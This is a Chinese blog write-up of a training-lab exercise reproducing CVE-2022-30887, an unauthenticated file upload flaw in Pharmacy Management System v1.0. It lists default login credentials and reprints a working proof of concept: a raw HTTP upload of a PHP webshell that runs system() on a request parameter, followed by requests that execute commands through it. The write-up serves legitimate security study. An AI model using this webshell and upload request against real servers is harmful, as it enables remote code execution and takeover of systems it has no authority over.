春秋云境:CVE-2022-30887(文件上传漏洞)复现分析

酿情师2026-05-29 10:32

前言

本文仅作渗透测试技术学习与复盘使用。所有实验均在正规授权靶场开展,禁止将相关技术用于任何未授权的网络攻击行为。请遵守法律法规,合法合规学习网络安全技术。

题目

多语言药房管理系统 (MPMS) 是用 PHP 和 MySQL 开发的, 该软件的主要目的是在药房和客户之间提供一套接口,客户是该软件的主要用户。该软件有助于为药房业务创建一个综合数据库,并根据到期、产品等各种参数提供各种报告。 该CMS中php_action/editProductImage.php存在任意文件上传漏洞,进而导致任意代码执行。

漏洞介绍

CVE-2022-30887 是一个高危 任意文件上传→远程代码执行(RCE) 漏洞,影响 Pharmacy Management System(MPMS)v1.0(Mayuri K. 开发的多语言药房管理系统,PHP+MySQL)。

披露时间:2022-05-16(MITRE 收录)CVE

影响版本:Pharmacy Management System (MPMS) v1.0CVE

漏洞位于后台组件:

bash 复制代码 
/php_action/editProductImage.php

该文件用于 "编辑产品图片",但未对上传文件做任何类型校验、后缀黑名单 / 白名单、MIME 检查或内容过滤,直接将用户上传的文件保存到服务器,且可直接访问执行。

简言之:上传接口无任何安全校验,可直接传 PHP 木马并执行。

利用条件:

1、目标运行 MPMS v1.0;

2、/php_action/editProductImage.php 可访问;

3、无需登录 / 无需权限,匿名即可利用(部分环境可能需绕过登录,但核心上传接口无权限控制)。

CVE-2022-30887 是典型的无校验文件上传→RCE,因 MPMS v1.0 核心上传接口完全开放且无安全过滤,导致匿名即可拿服务器权限,属于 "一键 getshell" 级别的高危漏洞,在 2022--2024 年的靶场与渗透测试中频繁出现。

解题

这个要先登录的,许多渗透工作都是的,打外围是很难打出东西的。

点击下面的这个Mayuri K

这里是可以下载源码的:

社工方式查到默认账号密码:mayuri.infospace@gmail.com/mayurik

这里可以在源码里面找,也可以网上搜索。

也可以直接查相应的报告。

有关这个的账号一般是这个,有时候密码会是其他的,比如rootadmin。

比如:

这个也是一个RCE。

登录进去是:

这里有文件上传点:

但是这个不是。

在这里:

添加药物图片:

上传一句话木马:

上传成功后,复制图像链接:

一片空白,说明上传成功了。

HackBar即可。

当然,也可以用蚁剑:

POC

国家信息安全漏洞库已经收录该漏洞:

https://www.cnnvd.org.cn/home/globalSearch?keyword=CVE-2022-30887

Content:

html 复制代码 
# Exploit Title: Pharmacy management system - Remote Code Execution (RCE)
# Date: 19/04/2022
# Exploit Author: Saud Alenazi
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/15281/multi-language-pharmacy-management-system-project-source-code.html
# Version: 1.0
# Tested on: XAMPP, Linux
# Contact: https://twitter.com/dmaral3noz

# Exploit  : 
 
You can upload a php shell file as a productImage

# ------------------------------------------------------------------------------------------
#                                           POC
# ------------------------------------------------------------------------------------------

# Request sent as base user

POST /dawapharma/dawapharma/php_action/editProductImage.php?id=1 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------208935235035266125502673738631
Content-Length: 559
Connection: close
Cookie: PHPSESSID=d2hvmuiicg9o9jl78hc2mkneel
Upgrade-Insecure-Requests: 1

-----------------------------208935235035266125502673738631
Content-Disposition: form-data; name="old_image"


-----------------------------208935235035266125502673738631
Content-Disposition: form-data; name="productImage"; filename="shell.php"
Content-Type: image/jpeg

<?php
if($_REQUEST['s']) {
  system($_REQUEST['s']);
  } else phpinfo();
?>
</pre>
</body>
</html>
-----------------------------208935235035266125502673738631
Content-Disposition: form-data; name="btn"


-----------------------------208935235035266125502673738631--




# Response

HTTP/1.1 302 Found
Date: Tue, 19 Apr 2022 20:43:17 GMT
Server: Apache/2.4.52 (Unix) OpenSSL/1.1.1m PHP/8.1.2 mod_perl/2.0.11 Perl/v5.32.1
X-Powered-By: PHP/8.1.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
location: ../product.php
Content-Length: 77
Connection: close
Content-Type: text/html; charset=UTF-8

Image uploaded successfully{"success":true,"messages":"Successfully Updated"}



# ------------------------------------------------------------------------------------------
#                                   Request to webshell
# ------------------------------------------------------------------------------------------

GET /dawapharma/dawapharma/assets/myimages/shell.php?s=echo+0xSaudi HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=d2hvmuiicg9o9jl78hc2mkneel



# ------------------------------------------------------------------------------------------
#                                    Webshell response
# ------------------------------------------------------------------------------------------


HTTP/1.1 200 OK
Date: Tue, 19 Apr 2022 20:55:58 GMT
Server: Apache/2.4.52 (Unix) OpenSSL/1.1.1m PHP/8.1.2 mod_perl/2.0.11 Perl/v5.32.1
X-Powered-By: PHP/8.1.2
Content-Length: 33
Connection: close
Content-Type: text/html; charset=UTF-8




0xSaudi
</pre>
</body>
</html>

其中,POC是:

html 复制代码 
POST /dawapharma/dawapharma/php_action/editProductImage.php?id=1 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------208935235035266125502673738631
Content-Length: 559
Connection: close
Cookie: PHPSESSID=d2hvmuiicg9o9jl78hc2mkneel
Upgrade-Insecure-Requests: 1

-----------------------------208935235035266125502673738631
Content-Disposition: form-data; name="old_image"


-----------------------------208935235035266125502673738631
Content-Disposition: form-data; name="productImage"; filename="shell.php"
Content-Type: image/jpeg

<?php
if($_REQUEST['s']) {
  system($_REQUEST['s']);
  } else phpinfo();
?>
</pre>
</body>
</html>
-----------------------------208935235035266125502673738631
Content-Disposition: form-data; name="btn"


-----------------------------208935235035266125502673738631--

返回:

html 复制代码 
HTTP/1.1 302 Found
Date: Tue, 19 Apr 2022 20:43:17 GMT
Server: Apache/2.4.52 (Unix) OpenSSL/1.1.1m PHP/8.1.2 mod_perl/2.0.11 Perl/v5.32.1
X-Powered-By: PHP/8.1.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
location: ../product.php
Content-Length: 77
Connection: close
Content-Type: text/html; charset=UTF-8

Image uploaded successfully{"success":true,"messages":"Successfully Updated"}

其中,出现Image uploaded successfully{"success":true,"messages":"Successfully Updated"}就是成功了。

在题目里面也是,可以进行抓包分析。

按照这个,上传后访问的地址是:

bash 复制代码 
http://localhost/dawapharma/dawapharma/assets/myimage/shell.php

执行命令是:

bash 复制代码 
http://localhost/dawapharma/dawapharma/assets/myimage/shell.php?s=whoami
相关推荐
Aphasia3118 小时前
VPN 与内网穿透
安全
Mr_愚人派1 天前
当"Claude"不再是 Claude:一次第三方 API 代理引发的 AI 身份伪造排查实录
人工智能·安全
DaLi Yao2 天前
【无标题】
人工智能·安全
Alsn862 天前
等待学习-学习目录:Docker 容器安全攻防
学习·安全·docker
网络研究院2 天前
2026年网络安全
网络·安全·法律·法规·趋势·发展
酣大智2 天前
ARP代理--工作原理
运维·网络·arp·arp代理
treesforest2 天前
AI安全系统如何识别异常访问?IP风险识别正在成为关键能力
网络·人工智能·tcp/ip·安全·web安全
shushangyun_2 天前
2026年快消品B2B系统推荐:支持终端门店订货、促销政策自动化的工具?
java·运维·网络·数据库·人工智能·spring·自动化
2601_961845152 天前
粉笔行测题库|系统班|刷题
网络·百度·微信·微信公众平台·facebook·新浪微博
零零信安2 天前
零零信安荣登数世咨询《新质·数字安全专精百强(2026)》暗网情报领域,彰显专业实力与创新引领
安全·网络安全·数据泄露·暗网·零零信安
热门推荐
012026年6月AI行业全景:从百模大战到Agent元年,这30天发生了什么?022026年6月AI大模型全景报告:GPT-5.6、Claude Opus 4.8、Gemini 3.5,中美AI三足鼎立谁主沉浮?032026 年 AI 编程工具终极横评:Cursor vs Claude Code vs Copilot vs Windsurf04【AI】2026 年具身智能模型和世界模型总结05GitHub 镜像站点062026 AI 编程工具终极实战指南:Cursor vs Claude Code vs Copilot,开发者该怎么选?07AI科技热点日报 | 2026年6月1日08Codex 下载安装指南:Windows 和 macOS 官方版下载09上线仅72小时被强制下架:Claude Fable 5 的短命10AI一周事件 · 2026-06-03 至 2026-06-09